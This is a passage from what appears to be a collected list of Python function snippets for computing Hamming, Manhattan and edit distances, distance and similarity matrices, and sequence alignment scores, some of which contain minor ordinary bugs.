gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n # Call the function to compute the similarity score.\n return measure.get_sim_score(s1, s2)", "def hamming(a, b):\n len1 = len(a)\n len2 = len(b)\n overlap = min(len1, len2)\n difference = abs(len1 - len2)\n for x in range(overlap):\n if a[x] != b[x]:\n difference += 1\n\n return difference", "def gen_dist(genes):\n\n # First generate an NxNxB matrix that has False where\n # i and j individuals have the same kth gene and True\n # otherwise (XOR operation). Then sum along\n # the genome axis to get distance\n return np.sum(genes[:,None,:] ^ genes, axis=-1)", "def hammingDist(x, y):\n hd = 0\n for ch1, ch2 in zip(x, y):\n if ch1 != ch2:\n hd += 1\n return hd", "def hamming(s1, s2):\n assert len(s1) == len(s2)\n return sum(c1 != c2 for c1, c2 in zip(s1, s2))", "def hamming(s1, s2):\n weight = abs(len(s1)-len(s2))\n if len(s1) < len(s2):\n s1, s2 = s2, s1\n for i in range(len(s2)):\n weight += not s1[i] == s2[i]\n return weight", "def get_mismatch_matrix(k,m):\n words = get_words(k)\n N = len(words)\n\n mismatch_matrix = np.zeros((N, N))\n for i in range(N):\n for j in range(i, N):\n if Levenshtein.hamming(words[i], words[j]) <= m:\n mismatch_matrix[i,j] = 1/2\n mismatch_matrix[j,i] = 1/2\n\n return mismatch_matrix", "def sim_adj_matrix(sents, sim_hash, min_sim=0.1):\n # return [[1 if sim_hash[s1][s2] > min_sim else 0\n # for s2 in sents]\n # for s1 in sents]\n\n return np.array([[sim_hash[s1][s2] for s2 in sents] for s1 in sents])", "def reduce_mtx(distmat, indices):\r\n return distmat.take(indices, 0).take(indices, 1)", "def distance_mentions(m_i, m_j):\n return abs(m_i.id - m_j.id)", "def compute_distmat(data, distfn):\n out = np.zeros((data.shape[0], data.shape[0]))\n for i in xrange(data.shape[0]):\n for j in xrange(data.shape[0]):\n if i == j: continue\n out[i,j] = distfn(data[i,:,:], data[j,:,:])\n return out", "def pairwise(self, arr_x, mat_y):\n n, h = mat_y.shape\n x = np.tile(arr_x, (n, 1)) # become nxh\n x_big = x >= mat_y\n difference = x-mat_y\n big_sum = (x_big * difference).sum(axis=1) # n\n small_sum = ((1-x_big) * (-difference)).sum(axis=1)\n sum_ = (big_sum ** self.p + small_sum ** self.p)\n dist = sum_ ** (1/self.p)\n\n if self.normalize:\n stack = np.stack((x, mat_y, difference), 0)\n stack = np.abs(stack)\n m = stack.max(0).sum(-1)\n dist /= m\n return dist", "def similarity_matrix(feat_mat):\n sim_mat = cosine_similarity(feat_mat)\n np.fill_diagonal(sim_mat, 0)\n return sim_mat", "def hamming_distance(StringA,StringB):\n if len(StringA) != String(B):\n raise ValueError(\"The length of sequences are not equal!\")\n return sum(x !=y for (x,y) in zip(StringA,StringB))", "def manhattan_distances(X, Y):\r\n D = np.zeros((X.shape[0],Y.shape[0]))\r\n \r\n for X_idx in range(X.shape[0]):\r\n for Y_idx in range(Y.shape[0]): \r\n \r\n D[X_idx,Y_idx] = np.sum(np.abs(X[X_idx,:] - Y[Y_idx,:]))\r\n \r\n return D", "def dist_manhattan(datamtx, strict=True):\n if strict:\n if not all(isfinite(datamtx)):\n raise ValueError(\"non finite number in input matrix\")\n if rank(datamtx) != 2:\n raise ValueError(\"input matrix not 2D\")\n numrows, numcols = shape(datamtx)\n else:\n try:\n numrows, numcols = shape(datamtx)\n except ValueError:\n return zeros((0,0),'d')\n\n if numrows == 0 or numcols == 0:\n return zeros((0,0),'d')\n dists = zeros((numrows,numrows),'d')\n for i in range(numrows):\n r1 = datamtx[i] # cache here\n for j in range(i):\n dists[i,j] = dists[j,i] = sum(abs(r1 - datamtx[j]))\n \n return dists", "def pair_hmm_align_unaligned_seqs(seqs,moltype,params={}):\n \n seqs = LoadSeqs(data=seqs,moltype=moltype,aligned=False)\n try:\n s1, s2 = seqs.values()\n except ValueError:\n raise ValueError,\\\n \"Pairwise aligning of seqs requires exactly two seqs.\"\n \n try:\n gap_open = params['gap_open']\n except KeyError:\n gap_open = 5\n try:\n gap_extend = params['gap_extend']\n except KeyError:\n gap_extend = 2\n try:\n score_matrix = params['score_matrix']\n except KeyError:\n score_matrix = make_dna_scoring_dict(\\\n match=1,transition=-1,transversion=-1)\n \n return global_pairwise(s1,s2,score_matrix,gap_open,gap_extend)", "def manhattan_distance(index1=(), index2=()):\r\n md = 0\r\n for a1, a2 in zip(index1, index2):\r\n md += abs(a1-a2)\r\n return md", "def hard_example_mining(dist_mat, labels, return_inds=False):\n assert len(dist_mat.size()) == 2\n assert dist_mat.size(0) == dist_mat.size(1)\n N = dist_mat.size(0)\n\n is_pos = labels.expand(N, N).eq(labels.expand(N, N).t())\n is_neg = labels.expand(N, N).ne(labels.expand(N, N).t())\n\n dist_ap, relative_p_inds = torch.max(\n dist_mat[is_pos].contiguous().view(N, -1), 1, keepdim=True)\n dist_an, relative_n_inds = torch.min(\n dist_mat[is_neg].contiguous().view(N, -1), 1, keepdim=True)\n\n dist_ap = dist_ap.squeeze(1)\n dist_an = dist_an.squeeze(1)\n\n if return_inds:\n ind = (labels.new().resize_as_(labels)\n .copy_(torch.arange(0, N).long())\n .unsqueeze(0).expand(N, N))\n p_inds = torch.gather(\n ind[is_pos].contiguous().view(N, -1), 1, relative_p_inds.data)\n n_inds = torch.gather(\n ind[is_neg].contiguous().view(N, -1), 1, relative_n_inds.data)\n p_inds = p_inds.squeeze(1)\n n_inds = n_inds.squeeze(1)\n return dist_ap, dist_an, p_inds, n_inds\n\n return dist_ap, dist_an", "def hamming_distance(p, q):\n result = 0\n for x, y in zip(p, q):\n if x != y:\n result += 1\n return result + abs(len(p) - len(q))", "def distance_metric(seg_A, seg_B, dx):\n table_md = []\n table_hd = []\n X, Y, Z = seg_A.shape\n for z in range(Z):\n # Binary mask at this slice\n slice_A = seg_A[:, :, z].astype(np.uint8)\n slice_B = seg_B[:, :, z].astype(np.uint8)\n\n # The distance is defined only when both contours exist on this slice\n if np.sum(slice_A) > 0 and np.sum(slice_B) > 0:\n # Find contours and retrieve all the points\n _, contours, _ = cv2.findContours(cv2.inRange(slice_A, 1, 1),\n cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_NONE)\n pts_A = contours[0]\n for i in range(1, len(contours)):\n pts_A = np.vstack((pts_A, contours[i]))\n\n _, contours, _ = cv2.findContours(cv2.inRange(slice_B, 1, 1),\n cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_NONE)\n pts_B = contours[0]\n for i in range(1, len(contours)):\n pts_B = np.vstack((pts_B, contours[i]))\n\n # Distance matrix between point sets\n M = np.zeros((len(pts_A), len(pts_B)))\n for i in range(len(pts_A)):\n for j in range(len(pts_B)):\n M[i, j] = np.linalg.norm(pts_A[i, 0] - pts_B[j, 0])\n\n # Mean distance and hausdorff distance\n md = 0.5 * (np.mean(np.min(M, axis=0)) + np.mean(np.min(M, axis=1))) * dx\n hd = np.max([np.max(np.min(M, axis=0)), np.max(np.min(M, axis=1))]) * dx\n table_md += [md]\n table_hd += [hd]\n\n # Return the mean distance and Hausdorff distance across 2D slices\n mean_md = np.mean(table_md) if table_md else None\n mean_hd = np.mean(table_hd) if table_hd else None\n return mean_md, mean_hd", "def cal_distances(embeddings):\n # calculate\n dist = np.zeros([len(embeddings), len(embeddings)], dtype=float)\n for ii in xrange(len(embeddings)):\n for jj in xrange(ii + 1, len(embeddings)):\n dist[ii, jj] = np.linalg.norm(embeddings[ii] - embeddings[jj])\n dist[jj, ii] = dist[ii, jj] \n \n # return\n return dist", "def nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n #print(indices.shape)\n #print(seqs_mat.shape)\n #print(seqs_L.shape)\n return _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix, gap_penalty)", "def mds(wish_distances, X=None, random_state=None):\n if len(wish_distances.shape) != 2:\n raise ValueError(\"The wish distances should be a 2D ndarray.\")\n if wish_distances.shape[0] == wish_distances.shape[1]:\n raise ValueError(\n \"The wish distances should be a squared array (of \"\n \"shape (n by n).\")\n n = wish_distances.shape[0]\n if X is not None and len(X) != n:\n raise ValueError(\n \"The length of \")", "def mds_torch(pre_dist_mat, weights=None, iters=10, tol=1e-5, eigen=False, verbose=0):\n device, dtype = pre_dist_mat.device, pre_dist_mat.type()\n # ensure batched MDS\n pre_dist_mat = expand_dims_to(pre_dist_mat, length = ( 3 - len(pre_dist_mat.shape) ))\n # start\n batch, N, _ = pre_dist_mat.shape\n diag_idxs = np.arange(N)\n his = [torch.tensor([np.inf]*batch, device=device)]\n\n # initialize by eigendecomposition: https://www.lptmc.jussieu.fr/user/lesne/bioinformatics.pdf\n # follow : https://www.biorxiv.org/content/10.1101/2020.11.27.401232v1.full.pdf\n D = pre_dist_mat**2\n M = 0.5 * (D[:, :1, :] + D[:, :, :1] - D) \n # do loop svd bc it's faster: (2-3x in CPU and 1-2x in GPU)\n # https://discuss.pytorch.org/t/batched-svd-lowrank-being-much-slower-than-loop-implementation-both-cpu-and-gpu/119336\n svds = [torch.svd_lowrank(mi) for mi in M]\n u = torch.stack([svd[0] for svd in svds], dim=0)\n s = torch.stack([svd[1] for svd in svds], dim=0)\n v = torch.stack([svd[2] for svd in svds], dim=0)\n best_3d_coords = torch.bmm(u, torch.diag_embed(s).abs().sqrt())[..., :3]\n\n # only eigen - way faster but not weights\n if weights is None and eigen==True:\n return torch.transpose( best_3d_coords, -1, -2), torch.zeros_like(torch.stack(his, dim=0))\n elif eigen==True:\n if verbose:\n print(\"Can't use eigen flag if weights are active. Fallback to iterative\")\n\n # continue the iterative way\n if weights is None:\n weights = torch.ones_like(pre_dist_mat)\n\n # iterative updates:\n for i in range(iters):\n # compute distance matrix of coords and stress\n best_3d_coords = best_3d_coords.contiguous()\n dist_mat = torch.cdist(best_3d_coords, best_3d_coords, p=2).clone()\n\n stress = ( weights * (dist_mat - pre_dist_mat)**2 ).sum(dim=(-1,-2)) * 0.5\n # perturb - update X using the Guttman transform - sklearn-like\n dist_mat[ dist_mat <= 0 ] += 1e-7\n ratio = weights * (pre_dist_mat / dist_mat)\n B = -ratio\n B[:, diag_idxs, diag_idxs] += ratio.sum(dim=-1)\n\n # update\n coords = (1. / N * torch.matmul(B, best_3d_coords))\n dis = torch.norm(coords, dim=(-1, -2))\n\n if verbose >= 2:\n print('it: %d, stress %s' % (i, stress))\n # update metrics if relative improvement above tolerance\n if (his[-1] - stress / dis).mean() <= tol:\n if verbose:\n print('breaking at iteration %d with stress %s' % (i,\n stress / dis))\n break\n\n best_3d_coords = coords\n his.append( stress / dis )\n\n x = torch.transpose(best_3d_coords, -1,-2)#, torch.stack(his, dim=0) ,historic_stresses: (batch x steps)\n x = x.permute(0,2,1)\n return x", "def compute_max_distance(xs, h):\n h1 = np.repeat(xs[:], np.shape(h)[0], axis=0)\n h2 = np.repeat([h], np.shape(xs)[0], axis=0)\n h2 = np.reshape(h2, (np.shape(xs)[0]*np.shape(h)[0], 3))\n return max(np.linalg.norm(h1-h2, axis=1))", "def ComputeDistMatrix(dict_alignedSequences):\r\n \r\n # check if dictionary with keys as tuples containing integers and values as tuples containing strings\r\n check = True \r\n #1 Check Input is dict\r\n if isinstance(dict_alignedSequences, dict) == False:\r\n check = False\r\n \r\n #2 Check are the keys and values tuples. Do the keys only contain integers and the vlaues only strings\r\n i = 0\r\n while len(dict_alignedSequences) > i:\r\n #checking for keys and values as tuples\r\n if isinstance(list(dict_alignedSequences.keys())[i], tuple) == False or isinstance(list(dict_alignedSequences.values())[i], tuple) == False:\r\n check = False\r\n break\r\n #checking keys for integers\r\n if isinstance(list(dict_alignedSequences.keys())[i][0], int) == False or isinstance(list(dict_alignedSequences.keys())[i][1], int) == False:\r\n check = False\r\n break\r\n #checking values for strings\r\n if isinstance(list(dict_alignedSequences.values())[i][0], str) == False or isinstance(list(dict_alignedSequences.values())[i][1], str) == False:\r\n check = False\r\n break\r\n \r\n #increment the counter for while loop\r\n i += 1\r\n \r\n #3 Check sequences contain aligned DNA and are of equal length\r\n for key in dict_alignedSequences:\r\n if is_aligned_dna(dict_alignedSequences[key][0]) == False or is_aligned_dna(dict_alignedSequences[key][1]) == False:\r\n check = False\r\n break\r\n if len(dict_alignedSequences[key][0]) != len(dict_alignedSequences[key][1]):\r\n check = False\r\n break\r\n \r\n #final evalauation if data is usable\r\n if check == False:\r\n raise TypeError ('malformed input')\r\n \r\n #get number of sequences\r\n matrixdim = howmany_sequences(dict_alignedSequences)\r\n #initialize dist matrix\r\n distMatrix = init_Dist_Matrix(matrixdim)\r\n \r\n \r\n for i in dict_alignedSequences.keys():\r\n # useing the key i to get the corisponding aligned sequences \r\n seq = dict_alignedSequences[i]\r\n #calculate distances between the sequences\r\n distance = calculate_distance(seq[0],seq[1])\r\n #markdown result at the corrsiponding place in the distmatrix\r\n distMatrix[i[0]][i[1]] = distance\r\n distMatrix[i[1]][i[0]] = distance\r\n \r\n return(distMatrix)", "def hard_example_mining(dist_mat, labels, return_inds=False):\n assert dist_mat.ndimension() == 2\n assert dist_mat.size(0) == dist_mat.size(1)\n N = dist_mat.size(0)\n\n is_pos = labels.expand(N, N).eq(labels.expand(N, N).t())\n is_neg = labels.expand(N, N).ne(labels.expand(N, N).t())\n\n tmp = Variable(dist_mat.data.new().resize_as_(dist_mat.data).fill_(1e4))\n\n dist_ap, p_inds = torch.max(dist_mat - is_neg.float() * tmp, 1, keepdim=False)\n dist_an, n_inds = torch.min(dist_mat + is_pos.float() * tmp, 1, keepdim=False)\n if return_inds:\n return dist_ap, dist_an, p_inds, n_inds\n return dist_ap, dist_an", "def dice_similarity_matrix(references: np.ndarray, queries: np.ndarray) -> np.ndarray:\n size1 = references.shape[0]\n size2 = queries.shape[0]\n scores = np.zeros((size1, size2))\n for i in range(size1):\n for j in range(size2):\n scores[i, j] = dice_similarity(references[i, :], queries[j, :])\n return scores", "def pairwiseScore(seq1, seq2, matrix):\n \n gap = -4.0\n incr_top = 0\n incr_bottom = 0\n pairwise_score = 0\n for i,j in zip(range(len(seq1)), range(len(seq2))):\n aa1 = seq1[i]\n aa2 = seq2[j] \n if aa1==\"-\" and aa2 ==\"-\" :\n pairwise_score += 0\n elif aa1!=\"-\" and aa2!=\"-\":\n pairwise_score += float(matchScore(aa1, aa2, matrix))\n elif aa1==\"-\" and aa2!=\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11==\"-\" and aa22!=\"-\":\n incr_top += 1\n else: \n pairwise_score += gap + incr_top * incr_top\n incr_top = 0\n except: \n pairwise_score += gap\n pass\n elif aa1!=\"-\" and aa2==\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11!=\"-\" and aa22==\"-\":\n incr_bottom += 1\n else: \n pairwise_score += gap + incr_bottom * incr_bottom\n incr_bottom = 0\n except: \n pairwise_score += gap\n pass\n else: pass\n \n return pairwise_score", "def seqmat2align(smat,index=None):\n if index is None:\n index = np.arange(smat.shape[0])\n return pd.Series([''.join(smat[seqi,:].astype(str)) for seqi in np.arange(smat.shape[0])], name='seq', index=index)", "def generalised_hamming_distance(a, b):\n if len(a) == len(b):\n return hamming_distance(a, b)\n if len(a) > len(b):\n dna = a\n kmer = b\n else:\n dna = b\n kmer = a\n k = len(kmer)\n\n dist = min([hamming_distance(kmer, kmer2) for kmer2 in kmers_from_dna(dna, k)])\n return dist", "def lcs_hamming_only_matches(s1: str, s2: str, k: int, length: int, matches_lst: List):\n count = 0\n for i in range(0, len(s1) - length + 1):\n for j in range(0, len(s2) - length + 1):\n sub1 = s1[i: i + length]\n sub2 = s2[j: j + length]\n result = hamming_distance(sub1, sub2)\n if result <= k:\n matches_lst.append([i, j, result, sub1, sub2])\n count += 1\n # print(\"total matches: \" + str(count))\n return count", "def measure_distance(self, mat):\n if len(mat) == 1:\n print(\"chain has only one CAatom\")\n return\n self.dists = []\n for num in range(0, len(mat)):\n if num + 1 <= len(mat) - 1:\n c1 = mat[num]\n c2 = mat[num + 1]\n d = c2 - c1\n self.dists.append(math.sqrt(np.sum(d * d)))\n return self.dists", "def full_matrix(ops, mut):\n \n index_mat = np.ones((len(ops),len(ops)))\n pairs = np.argwhere(np.triu(index_mat)==1)\n dist_mat = np.zeros((len(ops),len(ops)))\n distances = []\n labels = []\n\n for pair in pairs:\n mi, label = mut.distance(ops[pair[0]], ops[pair[1]])\n distances.append(mi)\n labels.append(label)\n with ProgressBar():\n distances = dask.compute(*distances)\n\n for i in range(len(labels)):\n mut.memo[labels[i]] = distances[i]", "def hamming(s1, s2):\n s1 = str(s1)\n s2 = str(s2)\n if len(s1) != len(s2):\n raise ValueError(\"Undefined for sequences of unequal length.\")\n return sum(el1 != el2 for el1, el2 in zip(s1, s2))", "def _create_distance_matrix(mesh):\n l = len(mesh.faces)\n\n faces = polygons(mesh.faces, mesh.vertices, mesh.face_normals, mesh.area_faces)\n # map from edge-key to adjacent faces\n adj_faces_map = {}\n # find adjacent faces by iterating edges\n for index, face in enumerate(faces):\n for edge in face.edge_keys:\n if (edge[0] > edge[1]):\n new_edge = (edge[1], edge[0])\n else:\n new_edge = (edge[0], edge[1])\n if new_edge in adj_faces_map:\n adj_faces_map[new_edge].append(index) # 一对多\n else:\n adj_faces_map[new_edge] = [index]\n\n # helping vectors to create sparse matrix later on\n row_indices = []\n col_indices = []\n Gval = [] # values for matrix of angular distances\n Aval = [] # values for matrix of geodesic distances\n # iterate adjacent faces and calculate distances\n for edge, adj_faces in adj_faces_map.items():\n if len(adj_faces) == 2:\n i = adj_faces[0]\n j = adj_faces[1]\n # 一条边连接的两个面\n Gtemp = _geodesic_distance(mesh, faces[i], faces[j], edge) # 测地距离\n Atemp = _angular_distance(mesh, faces[i], faces[j]) # 角距离 # 其实是余弦距离\n Gval.append(Gtemp)\n Aval.append(Atemp)\n row_indices.append(i)\n col_indices.append(j)\n # add symmetric entry\n Gval.append(Gtemp)\n Aval.append(Atemp)\n row_indices.append(j)\n col_indices.append(i)\n\n elif len(adj_faces) > 2:\n print(\"Edge with more than 2 adjacent faces: \" + str(adj_faces) + \"!\")\n\n Gval = numpy.array(Gval)\n Aval = numpy.array(Aval)\n # delta是去全局变量,外部传入的\n values = delta * Gval / numpy.mean(Gval) + \\\n (1.0 - delta) * Aval / numpy.mean(Aval)\n\n # create sparse matrix\n distance_matrix = scipy.sparse.csr_matrix(\n (values, (row_indices, col_indices)), shape=(l, l))\n return distance_matrix", "def hard_examples_mining(dist_mat, identity_mat, return_idxes=False):\n # the implementation here is a little tricky, dist_mat contains pairwise distance between probe image and other\n # images in current mini-batch. As we want to select positive examples of the same person, we add a constant\n # negative offset on other images before sorting. As a result, images of the **same** person will rank first.\n sorted_dist_mat, sorted_idxes = torch.sort(dist_mat + (-1e7) * (1 - identity_mat), dim=1,\n descending=True)\n dist_ap = sorted_dist_mat[:, 0]\n hard_positive_idxes = sorted_idxes[:, 0]\n\n # the implementation here is similar to above code, we add a constant positive offset on images of same person\n # before sorting. Besides, we sort in ascending order. As a result, images of **different** persons will rank first.\n sorted_dist_mat, sorted_idxes = torch.sort(dist_mat + 1e7 * identity_mat, dim=1,\n descending=False)\n dist_an = sorted_dist_mat[:, 0]\n hard_negative_idxes = sorted_idxes[:, 0]\n if return_idxes:\n return dist_ap, dist_an, hard_positive_idxes, hard_negative_idxes\n return dist_ap, dist_an", "def compute_pair_site_freqs_serial(alignment_data=None, mx=None,\n seqs_weight=None):\n alignment_shape = alignment_data.shape\n num_seqs = alignment_shape[0]\n seqs_len = alignment_shape[1]\n num_site_pairs = (seqs_len - 1) * seqs_len / 2\n num_site_pairs = np.int64(num_site_pairs)\n m_eff = np.sum(seqs_weight)\n # pair_site_freqs = np.zeros(\n # shape=(num_site_pairs, num_site_states - 1, num_site_states - 1),\n # dtype = np.float64)\n pair_site_freqs = [] # list form so its easier to handle varied num_site_states\n pair_counter = 0\n for i in range(seqs_len - 1):\n column_i = alignment_data[:, i]\n i_site_states = mx[i]\n if len(np.unique(column_i)) != i_site_states:\n print('unique vals doesn\\'match site states')\n sys.exit()\n\n for j in range(i + 1, seqs_len):\n column_j = alignment_data[:, j]\n j_site_states = mx[j]\n if len(np.unique(column_j)) != j_site_states:\n print('unique vals doesn\\'match site states')\n sys.exit()\n pair_site_freqs.append([])\n\n for a in np.unique(column_i):\n pair_site_freqs[-1].append([])\n count_ai = column_i == a\n\n for b in np.unique(column_j):\n count_bj = column_j == b\n count_ai_bj = count_ai * count_bj\n freq_ia_jb = np.sum(count_ai_bj * seqs_weight)\n # pair_site_freqs[pair_counter, a-1, b-1] = freq_ia_jb/m_eff\n pair_site_freqs[-1][-1].append(freq_ia_jb / m_eff)\n # move to the next site pair (i, j)\n pair_counter += 1\n if len(pair_site_freqs) != num_site_pairs:\n print('Not enough site pairs generated')\n sys.exit()\n return pair_site_freqs", "def diagonal_pairings(mat):\n\tw, h = mat.shape\n\tx = mat[:-1,:-1]\n\ty = mat[1:, 1:]\n\tx_cor_list = []\n\ty_cor_list = []\n\tfor i in range(w-1):\n\t\tfor j in range(h-1):\n\t\t\tx_cor_list.append(x[i, j])\n\t\t\ty_cor_list.append(y[i, j])\n\n\treturn x_cor_list, y_cor_list", "def similarity_matrix(points, sigma):\n distances_squared = spherical_distances(points, points)**2\n\n \n return np.exp( -distances_squared / (2.0 * sigma) )", "def get_distance_hamming(self, vec):\r\n\r\n sum = 0\r\n if len(self.weights) == len(vec):\r\n return self.hamming(self.weights, vec)\r\n else:\r\n sys.exit(\"Error: dimension of nodes != input data dimension!\")", "def pair_hmm_align_unaligned_seqs(seqs, moltype=DNA_cogent, params={}):\r\n\r\n seqs = LoadSeqs(data=seqs, moltype=moltype, aligned=False)\r\n try:\r\n s1, s2 = seqs.values()\r\n except ValueError:\r\n raise ValueError(\r\n \"Pairwise aligning of seqs requires exactly two seqs.\")\r\n\r\n try:\r\n gap_open = params['gap_open']\r\n except KeyError:\r\n gap_open = 5\r\n try:\r\n gap_extend = params['gap_extend']\r\n except KeyError:\r\n gap_extend = 2\r\n try:\r\n score_matrix = params['score_matrix']\r\n except KeyError:\r\n score_matrix = make_dna_scoring_dict(\r\n match=1, transition=-1, transversion=-1)\r\n\r\n return local_pairwise(s1, s2, score_matrix, gap_open, gap_extend)", "def construct_H_with_KNN_from_distance(dis_mat, k_neig, is_probH=True, m_prob=1, sig=0.002):\n n_obj = dis_mat.shape[0]\n # construct hyperedge from the central feature space of each node\n n_edge = n_obj\n H = np.zeros((n_obj, n_edge))\n for center_idx in range(n_obj):\n dis_mat[center_idx, center_idx] = 0\n dis_vec = dis_mat[center_idx]\n nearest_idx = np.array(np.argsort(dis_vec)).squeeze()\n #avg_dis = np.average(dis_vec)\n if not np.any(nearest_idx[:k_neig] == center_idx):\n nearest_idx[k_neig - 1] = center_idx\n\n for node_idx in nearest_idx[:k_neig]:\n if is_probH:\n H[node_idx, center_idx] = np.exp(- sig * dis_vec[0, node_idx] )\n #print(H[node_idx, center_idx])\n #H[node_idx, center_idx] = dis_vec[0, node_idx]\n else:\n H[node_idx, center_idx] = 1.0\n return H", "def im_dist_mat(self):\n mat = np.zeros([self.I, self.M])\n for i in range(self.I):\n for m in range(self.M):\n mat[i, m] = distance(self.I_coords[i], self.M_coords[m])\n return mat", "def manhattan_dist(idx, pos, n):\n\n row_dist = abs(pos // n - idx // n)\n col_dist = abs(pos % n - idx % n)\n return row_dist + col_dist", "def calc_symmetric_distance(hmm1, hmm2, T, K=1, seed=None):\n seqs1, _ = hmm1.generate_sequences(K, T, seed=seed)\n seqs2, _ = hmm2.generate_sequences(K, T, seed=seed)\n return np.abs(_calc_distance(hmm1, hmm2, seqs2) +\n _calc_distance(hmm2, hmm1, seqs1)) / 2", "def nm_dist_mat(self):\n mat = np.zeros([self.N, self.M])\n for n in range(self.N):\n for m in range(self.M):\n mat[n, m] = distance(self.N_coords[n], self.M_coords[m])\n return mat", "def lcs_hamming_only_matches_with_many_k(s1: str, s2: str, ks: List[int], length: int, matches_lst: List, query_name, target_name):\n file_name = './chromo_matches_' + str(length) + '.txt'\n f = open(file_name, mode='a')\n count = [0, 0, 0]\n for i in range(0, len(s1) - length + 1):\n for j in range(0, len(s2) - length + 1):\n sub1 = s1[i: i + length]\n sub2 = s2[j: j + length]\n result = hamming_distance(sub1, sub2)\n if result <= 0:\n # matches_lst.append([query_name, target_name, i, j, result, sub1, sub2])\n f.write(query_name + ',' + target_name + ',' + str(i) + ',' + str(j) + ',' + str(k)+ ',' + str(sub1) + ',' + sub2 + '\\n')\n count[0] += 1\n if result <= 1:\n f.write(query_name + ',' + target_name + ',' + str(i) + ',' + str(j) + ',' + str(k)+ ',' + str(sub1) + ',' + sub2 + '\\n')\n count[1] += 1\n if result <= 2:\n f.write(query_name + ',' + target_name + ',' + str(i) + ',' + str(j) + ',' + str(k)+ ',' + str(sub1) + ',' + sub2 + '\\n')\n count[2] += 1\n\n # print(\"total matches: \" + str(count))\n f.close()\n return count", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def get_seeds(seqs):\n k_lengths = list(range(6, 20))\n final_tuples = {}\n motifs_dic = {}\n\n # find most common seeds\n seeds = [find_motifs(seqs, k) for k in k_lengths]\n for i in k_lengths:\n motifs_dic[i] = seeds[i - 6][0:5]\n\n # calculate emissions and transitions\n global_possible_occurrences = [sum([len(seq) - k + 1 for seq in seqs]) for k in k_lengths]\n for key in motifs_dic.keys():\n key_tuples = []\n for m in motifs_dic[key]:\n seed = m[0]\n emissions, ind = build_e(seed, ALPHA)\n p = m[1] / global_possible_occurrences[key - 6]\n transitions = build_t(p, ind)\n key_tuples.append((seed, emissions, transitions))\n final_tuples[key] = key_tuples\n\n return final_tuples", "def get_exp_mismatch_matrix(k, _lambda):\n\n words = get_words(k)\n N = len(words)\n\n exp_mismatch_matrix = np.zeros((N, N))\n for i in range(N):\n exp_mismatch_matrix[i,i] = 1\n for j in range(i+1, N):\n exp_mismatch_matrix[i,j] = _lambda**Levenshtein.hamming(words[i], words[j])\n exp_mismatch_matrix[j,i] = exp_mismatch_matrix[i,j]\n\n return exp_mismatch_matrix", "def hamming_distance(h1, h2):\n b1 = bitarray.bitarray()\n b1.frombytes(h1)\n b2 = bitarray.bitarray()\n b2.frombytes(h2)\n return bitarray.bitdiff(b1, b2)", "def distance_between_pattern_and_strings(pattern, dna):\n\n k = len(pattern)\n distance = 0\n\n for text in dna:\n hamming_distance = 1000000\n for i in range(len(text) - k + 1):\n if hamming_distance > compute_hamming_distance(pattern, text[i:i + k]):\n hamming_distance = compute_hamming_distance(pattern, text[i:i + k])\n distance = distance + hamming_distance\n return distance", "def mpd(distmat):\r\n return distmat.sum() / (distmat.size - distmat.shape[0])", "def HammingDistance(pattern1, pattern2):\n distance = 0\n if len(pattern1) == len(pattern2):\n for i in range(len(pattern1)):\n if pattern1[i]!=pattern2[i]:\n distance += 1\n return distance\n else:\n assert 0, \"Two patterns have different lengths.\"", "def compute_hamming_distance(str1, str2):\n\n mismatches = 0\n len_strs = len(str1)\n for i in range(len_strs):\n if str1[i] != str2[i]:\n mismatches = mismatches + 1\n return mismatches", "def distance_matrix(sunspots1, sunspots2):\n \n N1 = len(sunspots1)\n N2 = len(sunspots2)\n\n distance_matrix = np.zeros((N1, N2))\n\n for i in list(range(N1)):\n for j in list(range(N2)):\n\n distance_matrix[i, j] = euclidean_dist(sunspots1[i], sunspots2[j])\n\n return distance_matrix", "def test_matrix_distance(self):\n # note that the score matrix must contain 'diagonal' elements m[i][i]\n # to avoid failure when the sequences match.\n m = {\"U\": {\"U\": 0, \"C\": 1, \"A\": 5}, \"C\": {\"C\": 0, \"A\": 2, \"G\": 4}}\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"UCACGG\", m), 14)\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"\", m), 0)\n self.assertEqual(self.RNA(\"UUU\").matrix_distance(\"CAC\", m), 7)\n self.assertRaises(KeyError, self.RNA(\"UUU\").matrix_distance, \"CAG\", m)", "def get_alphabet_similarity_matrix(self):\n distance_matrix = numpy.zeros((len(self.alphabet), len(self.alphabet)))\n numpy.fill_diagonal(distance_matrix, 0)\n for index_one, descriptor_one in enumerate(self.descriptors):\n for index_two, descriptor_two in enumerate(self.descriptors):\n distance = descriptor_one - descriptor_two\n squared_distance = numpy.dot(distance, distance)\n distance_matrix[index_one, index_two] = squared_distance\n distance_matrix /= 2. * (self.sigma_amino_acid ** 2)\n return numpy.exp(-distance_matrix)", "def distancematrix(vec1, vec2):\n v1, v2 = np.meshgrid(vec1, vec2)\n return np.abs(v1 - v2)", "def dist(dm, sm, neighbors):\n\n # Initialize list of possible distances\n distances = []\n\n # loop over all neighbors of the cell\n for neighbor in neighbors:\n # If the neighbor is valid\n if dm[neighbor[0], neighbor[1]] != -1:\n # add neighbor distance + 1 to possible distances\n distances.append(dm[neighbor[0], neighbor[1]] + 1)\n\n # return minimal distance\n return np.min(distances)", "def test_multilabel_hamming_distance(self, ddp, inputs, ignore_index, multidim_average, average):\n preds, target = inputs\n if ignore_index == -1:\n target = inject_ignore_index(target, ignore_index)\n if multidim_average == \"samplewise\" and preds.ndim < 4:\n pytest.skip(\"samplewise and non-multidim arrays are not valid\")\n if multidim_average == \"samplewise\" and ddp:\n pytest.skip(\"samplewise and ddp give different order than non ddp\")\n\n self.run_class_metric_test(\n ddp=ddp,\n preds=preds,\n target=target,\n metric_class=MultilabelHammingDistance,\n reference_metric=partial(\n _sklearn_hamming_distance_multilabel,\n ignore_index=ignore_index,\n multidim_average=multidim_average,\n average=average,\n ),\n metric_args={\n \"num_labels\": NUM_CLASSES,\n 